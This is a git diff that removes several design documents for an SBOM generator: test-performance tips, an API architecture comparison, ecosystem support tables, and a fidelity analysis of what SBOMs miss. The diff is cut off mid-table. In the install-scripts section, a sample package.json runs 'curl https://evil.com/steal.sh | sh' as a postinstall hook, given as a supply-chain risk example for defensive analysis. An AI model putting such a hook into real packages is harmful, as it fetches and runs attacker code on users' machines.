→ Test both, compare results -``` - -## Best Practices - -### Quick Reference - -```bash -# Development -pnpm check --staged # Fast feedback on staged changes -pnpm check # Run affected tests -pnpm lint --staged --fix # Fix staged files - -# Before commit -pnpm check # Full check on changed files -pnpm test # Full test suite - -# Coverage -pnpm run cover # Generate coverage report - -# Specific tests -pnpm test test/result.test.mts # Single test file -pnpm test 'test/**/*-url*.test.mts' # Glob pattern -``` - -### Optimization Checklist - -Test performance optimization: -- ✓ Use `--staged` for quick iteration -- ✓ Clean up resources in afterEach -- ✓ Avoid unnecessary isolation -- ✓ Use concurrent execution -- ✓ Filter worker error noise -- ✓ Monitor memory usage -- ✓ Profile slow tests - -### Common Pitfalls - -**Memory leaks**: -```javascript -// Bad: resource leak -it('spawns CLI', async () => { - const child = spawn('socket', ['--help']) - // Test logic - // Missing: child.kill() -}) - -// Good: cleanup -it('spawns CLI', async () => { - const child = spawn('socket', ['--help']) - try { - // Test logic - } finally { - child.kill() - } -}) -``` - -**False isolation needs**: -```javascript -// Bad: unnecessary isolation -describe('parser tests', { pool: 'forks' }, () => { - it('parses URL', () => { - // Pure function, no state mutation - }) -}) - -// Good: thread pool sufficient -describe('parser tests', () => { - it('parses URL', () => { - // Pure function, safe in threads - }) -}) -``` - -**Timeout confusion**: -```bash -# Test times out, don't blindly increase -testTimeout: 60_000 # Bad reflex - -# Instead: investigate why slow -# - Unnecessary waits? -# - Network timeout issues? -# - Process not terminating? 
-``` - -## Performance Monitoring - -### Tracking Metrics - -Monitor test suite health: -``` -Metric Target Alert -Suite time < 45s > 60s -Memory peak < 4GB > 5GB -Thread utilization > 60% < 40% -Timeout failures 0 > 2 -``` - -### Profiling Tests - -```bash -# Time specific test -time pnpm test test/slow.test.mts - -# Profile memory -NODE_OPTIONS="--max-old-space-size=4096 --heap-prof" pnpm test - -# Vitest reporter -pnpm test --reporter=verbose -``` - -### Continuous Improvement - -``` -Measure → Identify bottlenecks → Optimize → Verify - ↑ ↓ - └──────────────── Monitor ←─────────────────┘ -``` diff --git a/docs/sbom-generator/architecture.md b/docs/sbom-generator/architecture.md deleted file mode 100644 index 0b138bc33..000000000 --- a/docs/sbom-generator/architecture.md +++ /dev/null @@ -1,396 +0,0 @@ -# SBOM Generator - Architecture & API Design - -## Core Philosophy - -**SBOM is the canonical format. CodeT5 format is a derived optimization.** - -### Pipeline Flow - -``` -┌─────────────┐ -│ Lockfiles │ -│ (50,000 │ -│ tokens) │ -└──────┬──────┘ - │ Parse - ▼ -┌─────────────┐ -│ SBOM │ ◄─── Canonical Format (CycloneDX v1.5) -│ (Standard) │ • Industry standard -│ (~50KB) │ • Interoperable -└──────┬──────┘ • Cacheable - │ Enrich - ▼ -┌─────────────┐ -│ Enriched │ ◄─── + Socket Security Data -│ SBOM │ • Vulnerability data -│ (~75KB) │ • Security scores -└──────┬──────┘ • Supply chain risks - │ Format - ▼ -┌─────────────┐ -│ CodeT5 │ ◄─── Optimized for ML -│ Format │ • 600x token reduction -│ (~300 │ • Task-specific -│ tokens) │ • Context-prioritized -└─────────────┘ -``` - -## Why SBOM as Canonical Format? - -### 1. Industry Standard -- **CycloneDX v1.5** is widely adopted security standard -- Compatible with: Grype, Syft, Trivy, Dependency-Track, OWASP tools -- Can be consumed by external security tools - -### 2. Single Source of Truth -- Parse lockfiles once → Generate SBOM -- Convert SBOM → Multiple formats (CodeT5, JSON, XML, etc.) 
-- No duplicate parsing logic to maintain - -### 3. Flexibility -Generate different CodeT5 formats for different tasks: -```typescript -const sbom = await generateSbom('./project') // Parse once -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - -// Generate task-specific formats -const securityPrompt = formatSbomForCodeT5(enriched, { task: 'security-analysis' }) -const vulnPrompt = formatSbomForCodeT5(enriched, { task: 'vulnerability-detection' }) -const auditPrompt = formatSbomForCodeT5(enriched, { task: 'dependency-audit' }) -``` - -### 4. Cacheability -- Store SBOM in database/cache -- Regenerate CodeT5 format on-demand -- No need to re-parse lockfiles - -### 5. Debuggability -- Inspect full SBOM to troubleshoot issues -- Validate against CycloneDX schema -- Audit what data was sent to CodeT5 - -### 6. Evolution Path -- Add new enrichment sources (NVD, GitHub Advisory) -- Add new output formats (SPDX, custom) -- Add new optimization strategies - -## Format Comparison - -| Format | Size | Use Case | Audience | -|--------|------|----------|----------| -| **Lockfiles** | 50,000 tokens | Source data | Package managers | -| **SBOM (CycloneDX)** | ~50KB (12,500 tokens) | Standard interchange | Security tools, APIs | -| **Enriched SBOM** | ~75KB (18,750 tokens) | + Security data | Internal processing | -| **CodeT5 Format** | ~1KB (300 tokens) | ML analysis | CodeT5 model | - -**Token reduction: Raw → SBOM = 4x, Raw → CodeT5 = 166x** - -## API Design Options - -### Option A: SBOM-Only API (Standard) - -**Endpoint:** -```typescript -POST /api/v1/sbom/analyze -Content-Type: application/vnd.cyclonedx+json - -{ - "bomFormat": "CycloneDX", - "specVersion": "1.5", - "components": [...], - "dependencies": [...] -} -``` - -**Server Processing:** -1. Receive SBOM -2. Enrich with Socket data (if not already enriched) -3. Convert to CodeT5 format -4. Send to CodeT5 model -5. 
Return analysis - -**PROS:** -- ✅ Standard format, widely supported -- ✅ Other tools can send SBOMs -- ✅ Can validate against CycloneDX schema -- ✅ Easy to debug (inspect SBOM) - -**CONS:** -- ⚠️ Larger payload (~50KB) -- ⚠️ Conversion overhead on server - -### Option B: CodeT5-Optimized API (Fast) - -**Endpoint:** -```typescript -POST /api/v1/codet5/analyze -Content-Type: application/json - -{ - "task": "security-analysis", - "project": { - "name": "my-app", - "version": "1.0.0" - }, - "criticalIssues": [...], - "components": [...] // Minimal data -} -``` - -**Server Processing:** -1. Receive pre-optimized format -2. Send directly to CodeT5 model -3. Return analysis - -**PROS:** -- ✅ Small payload (~1KB) -- ✅ Fast transmission -- ✅ No conversion overhead - -**CONS:** -- ❌ Non-standard format -- ❌ Tightly coupled to CodeT5 -- ❌ Hard to debug (no full SBOM) -- ❌ Can't use with other tools - -### Option C: Hybrid API (Recommended) ✅ - -**Accept both formats:** - -```typescript -// Standard format for integrations -POST /api/v1/sbom/analyze -Content-Type: application/vnd.cyclonedx+json -{ "bomFormat": "CycloneDX", ... } - -// Optimized format for performance -POST /api/v1/codet5/analyze -Content-Type: application/json -{ "task": "security-analysis", ... } - -// Unified endpoint with auto-detection -POST /api/v1/analyze -Content-Type: application/vnd.cyclonedx+json OR application/json -{ ... } -``` - -**PROS:** -- ✅ Flexibility for different clients -- ✅ Standard format for integrations -- ✅ Optimized format for CLI/performance -- ✅ Future-proof - -**CONS:** -- ⚠️ More endpoints to maintain - -## Client-Side Flow - -### Flow 1: Socket CLI (Local Analysis) - -```typescript -// 1. Generate SBOM locally -const sbom = await generateSbom('./project') - -// 2. Enrich with Socket API -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - -// 3. Format for CodeT5 -const prompt = formatSbomForCodeT5(enriched, { task: 'security-analysis' }) - -// 4. 
Send optimized format to CodeT5 API (small payload) -const analysis = await fetch('/api/v1/codet5/analyze', { - method: 'POST', - body: JSON.stringify({ prompt, task: 'security-analysis' }) -}) -``` - -**Benefits:** -- Small API payload (1KB vs 50KB) -- Client controls optimization -- Can cache SBOM locally - -### Flow 2: CI/CD Integration (Standard) - -```typescript -// 1. Generate SBOM locally -const sbom = await generateSbom('./project') - -// 2. Send full SBOM to API (standard format) -const result = await fetch('/api/v1/sbom/analyze', { - method: 'POST', - headers: { 'Content-Type': 'application/vnd.cyclonedx+json' }, - body: JSON.stringify(sbom) -}) - -// Server handles enrichment and optimization -``` - -**Benefits:** -- Standard format, easy to integrate -- Server handles all processing -- Can use existing SBOM tools - -### Flow 3: External Tools (Standard) - -```bash -# Generate SBOM with other tools -cdxgen . -o sbom.json - -# Send to Socket API -curl -X POST https://api.socket.dev/v1/sbom/analyze \ - -H "Content-Type: application/vnd.cyclonedx+json" \ - -d @sbom.json -``` - -**Benefits:** -- Works with existing tooling -- No Socket CLI required -- Standard CycloneDX format - -## Conversion Performance - -### SBOM → CodeT5 Conversion - -**Benchmarks:** -- Parse SBOM: ~5ms -- Prioritize components: ~2ms -- Format output: ~3ms -- **Total: ~10ms** - -**Negligible overhead compared to:** -- Parsing lockfiles: ~500ms -- Socket API enrichment: ~2,000ms -- CodeT5 model inference: ~3,000ms - -### Caching Strategy - -```typescript -// Cache SBOM for fast regeneration -const cacheKey = `sbom:${projectPath}:${lockfileHash}` - -// Check cache -let sbom = await cache.get(cacheKey) -if (!sbom) { - sbom = await generateSbom(projectPath) - await cache.set(cacheKey, sbom, { ttl: 3600 }) -} - -// Convert to CodeT5 format (fast) -const prompt = formatSbomForCodeT5(sbom, { task }) -``` - -## Alternative Considered: Separate Generators - -### Why NOT Generate Both Separately 
- -```typescript -// ❌ BAD: Two separate parsers -const sbom = await generateSbom('./project') -const codeT5Data = await generateCodeT5Format('./project') -``` - -**Problems:** -1. **Duplicate parsing** - Parse lockfiles twice (expensive) -2. **Two sources of truth** - Can diverge, hard to maintain -3. **Not reusable** - CodeT5 format only works for CodeT5 -4. **Maintenance burden** - Keep two parsers in sync -5. **More code** - More complexity, more bugs - -## Implementation Examples - -### Example 1: CLI Tool - -```typescript -#!/usr/bin/env node -import { generateSbom, enrichSbomWithSocket, formatSbomForCodeT5 } from '@socketsecurity/sbom-generator' - -async function main() { - // 1. Generate SBOM - console.log('Generating SBOM...') - const sbom = await generateSbom(process.cwd()) - - // 2. Enrich with Socket - console.log('Enriching with Socket data...') - const enriched = await enrichSbomWithSocket(sbom, { - apiToken: process.env.SOCKET_API_TOKEN - }) - - // 3. Format for CodeT5 - console.log('Optimizing for CodeT5...') - const prompt = formatSbomForCodeT5(enriched, { - task: 'security-analysis' - }) - - // 4. 
Send to API (small payload) - console.log('Sending to CodeT5 API...') - const response = await fetch('https://api.socket.dev/v1/codet5/analyze', { - method: 'POST', - headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify({ prompt, task: 'security-analysis' }) - }) - - const analysis = await response.json() - console.log(analysis) -} - -main() -``` - -### Example 2: API Server - -```typescript -import express from 'express' -import { enrichSbomWithSocket, formatSbomForCodeT5 } from '@socketsecurity/sbom-generator' - -const app = express() - -// Accept standard SBOM format -app.post('/api/v1/sbom/analyze', async (req, res) => { - const sbom = req.body // CycloneDX SBOM - - // Enrich - const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - - // Convert to CodeT5 format - const prompt = formatSbomForCodeT5(enriched, { - task: req.query.task || 'security-analysis' - }) - - // Send to CodeT5 - const analysis = await codeT5.generate(prompt) - - res.json({ analysis }) -}) - -// Accept pre-optimized format -app.post('/api/v1/codet5/analyze', async (req, res) => { - const { prompt } = req.body - - // Send directly to CodeT5 - const analysis = await codeT5.generate(prompt) - - res.json({ analysis }) -}) -``` - -## Recommendation - -✅ **Keep current design: SBOM as canonical format, CodeT5 as derived format** - -### Implement Hybrid API: -1. **Primary endpoint**: Accept CycloneDX SBOM (standard) -2. **Optimized endpoint**: Accept CodeT5-formatted data (performance) -3. **Server-side conversion**: SBOM → CodeT5 on server (flexible) - -### Benefits: -- ✅ Standard format for interoperability -- ✅ Optimized format for performance -- ✅ Single source of truth (SBOM) -- ✅ Flexible, extensible, maintainable - -### Trade-offs Accepted: -- ⚠️ 10ms conversion overhead (negligible) -- ⚠️ Larger intermediate format (cacheable) - -This design provides the best balance of **standardization**, **performance**, and **flexibility**. 
diff --git a/docs/sbom-generator/ecosystems.md b/docs/sbom-generator/ecosystems.md deleted file mode 100644 index 40f955527..000000000 --- a/docs/sbom-generator/ecosystems.md +++ /dev/null @@ -1,211 +0,0 @@ -# SBOM Generator - Ecosystem Support - -Based on **depscan** ecosystem definitions from `/workspaces/lib/dist/ecosystems/`. - -## Complete Ecosystem List - -| Ecosystem | Display Name | Registry | PURL Type | Parse Strategy | Priority | -|-----------|--------------|----------|-----------|----------------|----------| -| **npm** | npm | npmjs.org | npm | Parse lockfiles | ✅ Tier 1 | -| **pypi** | PyPI | pypi.org | pypi | Parse lockfiles | ⏳ Tier 2 | -| **cargo** | Cargo | crates.io | cargo | Parse Cargo.lock | ⏳ Tier 2 | -| **go** | Go | proxy.golang.org | golang | Parse go.mod/go.sum | ⏳ Tier 2 | -| **maven** | Maven | repo1.maven.org | maven | Parse pom.xml OR convert gradle | ⏳ Tier 2 | -| **rubygems** | Rubygems | rubygems.org | gem | Parse Gemfile.lock | ⏳ Tier 2 | -| **nuget** | NuGet | nuget.org | nuget | Parse .csproj/packages.config | ⏳ Tier 2 | -| **actions** | GitHub Actions | github.com | github | Parse workflow YAML | ⏳ Tier 3 | -| **huggingface** | Hugging Face | huggingface.co | huggingface | API-based | ⏳ Tier 3 | -| **chrome** | Chrome | chromewebstore.google.com | chrome | API-based | ⏳ Tier 3 | -| **openvsx** | OpenVSX | open-vsx.org | vscode | API-based | ⏳ Tier 3 | - -**Note on Gradle**: Gradle is a **build tool**, not a separate ecosystem. Gradle projects publish to Maven repositories (repo1.maven.org), so they use the **maven** ecosystem. Socket-CLI already has gradle-to-maven conversion built-in (`socket manifest gradle`). - -## Implementation Strategy - -### Tier 1 - Implemented (1/11) -- ✅ **npm** - Full support for package-lock.json, yarn.lock, pnpm-lock.yaml - -### Tier 2 - High Priority (6/11) -Parse-first strategy for all traditional package managers: - -1. 
**pypi** (Python) - - **Files**: requirements.txt, Pipfile.lock, poetry.lock - - **Parser**: TOML (@iarna/toml), JSON - - **Priority**: High (2nd most common after npm) - -2. **cargo** (Rust) - - **Files**: Cargo.toml, Cargo.lock - - **Parser**: TOML (@iarna/toml) - - **Priority**: High (growing ecosystem) - -3. **go** (Go) - - **Files**: go.mod, go.sum - - **Parser**: Custom text format - - **Priority**: High (enterprise usage) - -4. **maven** (Java/JVM) - - **Files**: pom.xml, build.gradle, build.gradle.kts - - **Parser**: XML (fast-xml-parser) for pom.xml, gradle conversion for gradle files - - **Priority**: High (enterprise usage) - - **Note**: Gradle is a build tool that publishes to Maven repositories. Socket-CLI already has gradle support that converts to pom.xml format - -5. **rubygems** (Ruby) - - **Files**: Gemfile.lock - - **Parser**: Custom text format - - **Priority**: Medium - -6. **nuget** (.NET) - - **Files**: packages.config, .csproj - - **Parser**: XML (fast-xml-parser) - - **Priority**: Medium (enterprise usage) - -### Tier 3 - Additional Ecosystems (4/11) -API-based or special-case ecosystems: - -1. **actions** (GitHub Actions) - - **Files**: .github/workflows/*.yml - - **Parser**: YAML - - **Priority**: Low (workflows, not traditional packages) - -2. **huggingface** (ML Models) - - **Strategy**: API-based (huggingface.co API) - - **Priority**: Low (specialized use case) - -3. **chrome** (Browser Extensions) - - **Strategy**: API-based (Chrome Web Store API) - - **Priority**: Low (specialized use case) - -4. 
**openvsx** (VS Code Extensions) - - **Strategy**: API-based (open-vsx.org API) - - **Priority**: Low (specialized use case) - -## Lockfile Formats by Ecosystem - -### Text-Based (Custom Parsers) -- **npm/yarn**: yarn.lock (custom format via @yarnpkg/parsers) -- **go**: go.mod, go.sum (simple key-value text) -- **rubygems**: Gemfile.lock (custom Ruby-specific format) - -### JSON -- **npm**: package-lock.json -- **pypi**: Pipfile.lock - -### YAML -- **npm/pnpm**: pnpm-lock.yaml -- **actions**: workflow files (.github/workflows/*.yml) - -### TOML -- **pypi**: poetry.lock -- **cargo**: Cargo.lock - -### XML -- **maven**: pom.xml -- **nuget**: packages.config, .csproj - -### API-Based (No Lockfiles) -- **huggingface**: Models/datasets via huggingface.co API -- **chrome**: Extensions via Chrome Web Store API -- **openvsx**: Extensions via open-vsx.org API - -## Feature Matrix - -Based on depscan's feature flags: - -| Ecosystem | Alerts | AI Summary | Dependencies | Search | Scores | Show in Footer | -|-----------|--------|------------|--------------|--------|--------|----------------| -| npm | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| pypi | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| cargo | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| go | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| maven | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| rubygems | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| nuget | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| actions | ✅ | ❌ | ✅ | ✅ | ✅ | ❌ | -| huggingface | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| chrome | ✅ | ❌ | ❌ | ✅ | ❌ | ❌ | -| openvsx | ✅ | ❌ | ❌ | ✅ | ✅ | ❌ | - -**Key Insights**: -- All ecosystems support alerts and search -- npm and cargo get AI summaries (highest priority ecosystems) -- Most ecosystems support dependency tracking -- Chrome has minimal feature support (extensions are simpler) - -## Socket.dev Priority - -Based on depscan features and ecosystem importance: - -### Must-Have (Tier 1) -1. **npm** ✅ - Implemented - - Most popular JavaScript ecosystem - - Full feature support including AI summaries - -### Should-Have (Tier 2) -2. 
**pypi** - Python packages - - 2nd largest ecosystem - - Critical for ML/data science - -3. **cargo** - Rust crates - - AI summary support - - Growing security-conscious community - -4. **go** - Go modules - - Enterprise adoption - - Security-focused language - -5. **maven** - Java/JVM packages - - Enterprise dominance - - Large existing codebase - -### Nice-to-Have (Tier 2-3) -6. **rubygems** - Ruby gems -7. **nuget** - .NET packages - -### Future Consideration (Tier 3) -8. **actions** - GitHub Actions -9. **huggingface** - ML models -10. **chrome** - Browser extensions -11. **openvsx** - VS Code extensions - -## Implementation Roadmap - -### Phase 1 (Weeks 1-2) ✅ COMPLETE -- ✅ npm parser with full lockfile support -- ✅ Socket enrichment integration -- ✅ CodeT5 formatter - -### Phase 2 (Weeks 3-4) -- ⏳ pypi parser (requirements.txt, Pipfile.lock, poetry.lock) -- ⏳ cargo parser (Cargo.toml, Cargo.lock) - -### Phase 3 (Weeks 5-6) -- ⏳ go parser (go.mod, go.sum) -- ⏳ maven parser (pom.xml) - -### Phase 4 (Weeks 7-8) -- ⏳ rubygems parser (Gemfile.lock) -- ⏳ nuget parser (packages.config, .csproj) - -### Phase 5 (Future) -- ⏳ actions parser (workflow YAML) -- ⏳ API-based parsers (huggingface, chrome, openvsx) - -## Dependencies Required - -### Currently Used -- ✅ `@yarnpkg/parsers` - Parse yarn.lock -- ✅ `@iarna/toml` - Parse TOML (cargo, pypi) -- ✅ `fast-xml-parser` - Parse XML (maven, nuget) -- ✅ `yaml` - Parse YAML (pnpm, actions) - -### Future Needs -- ⏳ Custom go.mod/go.sum parser (simple text format) -- ⏳ Custom Gemfile.lock parser (Ruby-specific format) -- ⏳ API clients for huggingface, chrome, openvsx - -## References - -- **depscan ecosystem types**: `/workspaces/lib/dist/ecosystems/types.d.ts` -- **depscan ecosystem constants**: `/workspaces/lib/dist/ecosystems/constants.d.ts` -- **CycloneDX spec**: https://cyclonedx.org/docs/1.5/json/ -- **Package URL (PURL) spec**: https://github.com/package-url/purl-spec diff --git 
a/docs/sbom-generator/fidelity-analysis.md b/docs/sbom-generator/fidelity-analysis.md deleted file mode 100644 index 37790688c..000000000 --- a/docs/sbom-generator/fidelity-analysis.md +++ /dev/null @@ -1,617 +0,0 @@ -# SBOM Fidelity Analysis - What Might CodeT5 Miss? - -## Question: Does SBOM capture everything CodeT5 needs for smart analysis? - -**TL;DR: SBOM captures ~80% of what's needed. The missing 20% can be added via CycloneDX `properties` field.** - ---- - -## What SBOM Captures Well ✅ - -CycloneDX SBOM includes: -- ✅ Component names, versions, PURLs -- ✅ Dependency graph (who depends on who) -- ✅ Licenses -- ✅ Hashes (integrity) -- ✅ External references (URLs) -- ✅ Vulnerabilities (with Socket enrichment) -- ✅ Scope (required/optional/excluded) -- ✅ Properties (key-value pairs for custom metadata) - -**This covers the basics for security analysis.** - ---- - -## What SBOM Might Miss ⚠️ - -### 1. **Package Manager Metadata** - -#### Missing Context: -```json -// package.json -{ - "dependencies": { - "axios": "^0.21.0" // ← Version RANGE - } -} - -// package-lock.json (resolved) -{ - "axios": { - "version": "0.21.1", // ← Actual RESOLVED version - "resolved": "https://registry.npmjs.org/axios/-/axios-0.21.1.tgz", - "integrity": "sha512-...", - "requires": { - "follow-redirects": "^1.10.0" // ← Transitive constraint - } - } -} -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "0.21.1", // ✅ Has resolved version - "purl": "pkg:npm/axios@0.21.1" -} -``` - -**Missing:** -- ❌ Original version range (`^0.21.0`) from package.json -- ❌ Why this specific version was chosen (resolution algorithm) -- ❌ Alternative versions that could satisfy the range - -**Why CodeT5 might care:** -- Version range might allow vulnerable version -- Recent breaking change might explain issues -- Range allows automatic security updates - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "0.21.1", - "properties": [ - { "name": 
"socket:versionRange", "value": "^0.21.0" }, - { "name": "socket:requestedBy", "value": "my-app" }, - { "name": "socket:rangeAllowsVulnerable", "value": "true" } - ] -} -``` - ---- - -### 2. **Install Scripts (Security Critical!)** - -#### Missing Context: -```json -// package.json -{ - "name": "suspicious-package", - "scripts": { - "postinstall": "curl https://evil.com/steal.sh | sh" // ← DANGER! - } -} -``` - -**SBOM representation:** -```json -{ - "name": "suspicious-package", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ Has install scripts -- ❌ What scripts do (could be malicious) -- ❌ Whether scripts were executed - -**Why CodeT5 might care:** -- **Install scripts are #1 supply chain attack vector** -- CodeT5 should warn about packages with install scripts -- Especially important for transitive dependencies - -**Solution:** Add to properties: -```json -{ - "name": "suspicious-package", - "version": "1.0.0", - "properties": [ - { "name": "socket:hasInstallScripts", "value": "true" }, - { "name": "socket:installScriptCommands", "value": "postinstall" }, - { "name": "socket:installScriptRisk", "value": "high" } - ] -} -``` - -**Socket already detects this!** Just need to include in SBOM. - ---- - -### 3. **Peer Dependency Mismatches** - -#### Missing Context: -```json -// react-router (requires React 16+) -{ - "peerDependencies": { - "react": ">=16.8.0" - } -} - -// But project uses React 15 -{ - "dependencies": { - "react": "15.0.0" // ← Mismatch! 
- } -} -``` - -**SBOM representation:** -```json -{ - "dependencies": [ - { "ref": "pkg:npm/react-router@5.0.0", "dependsOn": ["pkg:npm/react@15.0.0"] } - ] -} -``` - -**Missing:** -- ❌ Peer dependency requirements -- ❌ Whether requirements are satisfied -- ❌ Potential runtime errors - -**Why CodeT5 might care:** -- Peer dependency mismatches cause runtime errors -- Common source of bugs -- Hard to debug - -**Solution:** Add to dependencies: -```json -{ - "ref": "pkg:npm/react-router@5.0.0", - "dependsOn": ["pkg:npm/react@15.0.0"], - "properties": [ - { "name": "socket:peerDependencyMismatch", "value": "true" }, - { "name": "socket:requiredPeerVersion", "value": ">=16.8.0" }, - { "name": "socket:actualPeerVersion", "value": "15.0.0" } - ] -} -``` - ---- - -### 4. **Duplicate Packages (Bloat & Security)** - -#### Missing Context: -``` -node_modules/ - ├── axios@0.21.0 ← App uses this - └── foo/ - └── node_modules/ - └── axios@0.19.0 ← Transitive dep uses old version -``` - -**SBOM representation:** -```json -{ - "components": [ - { "name": "axios", "version": "0.21.0" }, - { "name": "axios", "version": "0.19.0" } - ] -} -``` - -**Missing:** -- ❌ That these are duplicates of same package -- ❌ Why duplication happened -- ❌ Impact on bundle size -- ❌ Which version is actually used by each dependent - -**Why CodeT5 might care:** -- Multiple versions = multiple attack surfaces -- Old version might have known vulnerabilities -- Bundle size impact -- Could cause subtle bugs - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "0.19.0", - "properties": [ - { "name": "socket:isDuplicate", "value": "true" }, - { "name": "socket:newerVersionExists", "value": "0.21.0" }, - { "name": "socket:duplicateReason", "value": "transitive version mismatch" }, - { "name": "socket:installPath", "value": "node_modules/foo/node_modules/axios" } - ] -} -``` - ---- - -### 5. 
**Git/File Dependencies (Bypass Security)** - -#### Missing Context: -```json -// package.json -{ - "dependencies": { - "my-private-lib": "git+https://github.com/me/private.git#v1.0.0", - "local-utils": "file:../utils" - } -} -``` - -**SBOM representation:** -```json -{ - "name": "my-private-lib", - "version": "1.0.0", // ← Loses git context - "externalReferences": [ - { "url": "https://github.com/me/private.git", "type": "vcs" } - ] -} -``` - -**Missing:** -- ❌ That this is a git dependency (not from registry) -- ❌ Specific commit SHA (security critical!) -- ❌ That this bypasses npm security scanning -- ❌ File dependencies (completely untracked) - -**Why CodeT5 might care:** -- **Git deps bypass security scanning** - Major risk! -- No vulnerability database for git deps -- Mutable (branch/tag can change) -- File deps are completely unaudited - -**Solution:** Add to properties: -```json -{ - "name": "my-private-lib", - "version": "1.0.0", - "properties": [ - { "name": "socket:dependencyType", "value": "git" }, - { "name": "socket:gitUrl", "value": "https://github.com/me/private.git" }, - { "name": "socket:gitCommit", "value": "abc123..." }, - { "name": "socket:bypassesSecurityScan", "value": "true" } - ] -} -``` - ---- - -### 6. 
**Bundled Dependencies (Hidden Components)** - -#### Missing Context: -```json -// package.json -{ - "name": "my-package", - "bundledDependencies": ["native-addon"] -} -``` - -**SBOM representation:** -```json -{ - "name": "my-package", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ That this package bundles other dependencies -- ❌ What's inside the bundle (hidden from dependency graph) -- ❌ Bundled deps don't appear in lockfile - -**Why CodeT5 might care:** -- Bundled deps are hidden from scanning -- Might contain vulnerabilities -- Supply chain obfuscation - -**Solution:** Add to properties: -```json -{ - "name": "my-package", - "version": "1.0.0", - "properties": [ - { "name": "socket:hasBundledDeps", "value": "true" }, - { "name": "socket:bundledDeps", "value": "native-addon" } - ] -} -``` - ---- - -### 7. **Package Manager Configuration** - -#### Missing Context: -```ini -# .npmrc -registry=https://custom-registry.company.com -@myorg:registry=https://npm.pkg.github.com -``` - -**SBOM representation:** -```json -{ - "name": "@myorg/internal-lib", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ Custom registry used -- ❌ Private registry (might not be scanned by Socket) -- ❌ Authentication requirements - -**Why CodeT5 might care:** -- Private registry packages might not be scanned -- Custom registries could be compromised -- Supply chain visibility gaps - -**Solution:** Add to metadata: -```json -{ - "metadata": { - "properties": [ - { "name": "socket:customRegistry", "value": "https://custom-registry.company.com" }, - { "name": "socket:scopedRegistries", "value": "@myorg:https://npm.pkg.github.com" } - ] - } -} -``` - ---- - -### 8. 
**Resolutions/Overrides (Force Versions)** - -#### Missing Context: -```json -// package.json (Yarn/pnpm) -{ - "resolutions": { - "axios": "1.6.0" // ← Force ALL axios to this version - } -} - -// package.json (npm 8+) -{ - "overrides": { - "axios": "1.6.0" - } -} -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "1.6.0" -} -``` - -**Missing:** -- ❌ That version was forced (not naturally resolved) -- ❌ Why override was needed (probably security patch) -- ❌ What versions were overridden - -**Why CodeT5 might care:** -- Overrides indicate known issues -- Forced version might break things -- Shows active security management - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "1.6.0", - "properties": [ - { "name": "socket:isOverridden", "value": "true" }, - { "name": "socket:overrideReason", "value": "security-patch" }, - { "name": "socket:originalVersionRange", "value": "^0.21.0" } - ] -} -``` - ---- - -### 9. **Transitive Dependency Chain Context** - -#### Missing Context: -``` -my-app - └── express@4.18.0 - └── body-parser@1.20.0 - └── qs@6.10.0 ← Vulnerable! -``` - -**SBOM representation:** -```json -{ - "dependencies": [ - { "ref": "my-app", "dependsOn": ["express"] }, - { "ref": "express", "dependsOn": ["body-parser"] }, - { "ref": "body-parser", "dependsOn": ["qs"] } - ] -} -``` - -**Missing:** -- ❌ Full dependency chain (my-app → express → body-parser → qs) -- ❌ That qs is transitive (not directly depended on) -- ❌ Can't easily answer: "Why is this vulnerable package here?" 
- -**Why CodeT5 might care:** -- Need to explain: "qs@6.10.0 is pulled in by express → body-parser → qs" -- Helps user understand: "Update body-parser to fix" -- Chain length indicates maintenance burden - -**Solution:** Pre-compute and add to properties: -```json -{ - "name": "qs", - "version": "6.10.0", - "properties": [ - { "name": "socket:dependencyDepth", "value": "3" }, - { "name": "socket:dependencyChain", "value": "my-app → express → body-parser → qs" }, - { "name": "socket:isTransitive", "value": "true" }, - { "name": "socket:directParent", "value": "body-parser" }, - { "name": "socket:rootParent", "value": "express" } - ] -} -``` - ---- - -### 10. **Temporal/Historical Context** - -#### Missing Context: -``` -When was this dependency added? -How long has it been using this version? -How often do they update dependencies? -Are they behind on updates? -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "0.21.0", - "timestamp": "2024-01-15T10:00:00Z" // ← SBOM generation time -} -``` - -**Missing:** -- ❌ When dependency was first added to project -- ❌ How long they've been on this version -- ❌ Update frequency/patterns -- ❌ How far behind latest version - -**Why CodeT5 might care:** -- Old dependencies = higher security risk -- Infrequent updates = maintenance burden -- Far behind latest = technical debt - -**Solution:** Requires git history analysis (separate tool): -```json -{ - "name": "axios", - "version": "0.21.0", - "properties": [ - { "name": "socket:addedDate", "value": "2023-01-15" }, - { "name": "socket:daysSinceUpdate", "value": "365" }, - { "name": "socket:versionsBehind", "value": "15" }, - { "name": "socket:latestVersion", "value": "1.6.0" } - ] -} -``` - ---- - -## Summary: What's Missing - -| Category | Impact | Solution | Priority | -|----------|--------|----------|----------| -| **Install scripts** | 🔴 High | Add properties | Critical | -| **Git/File deps** | 🔴 High | Add properties | Critical | -| **Version 
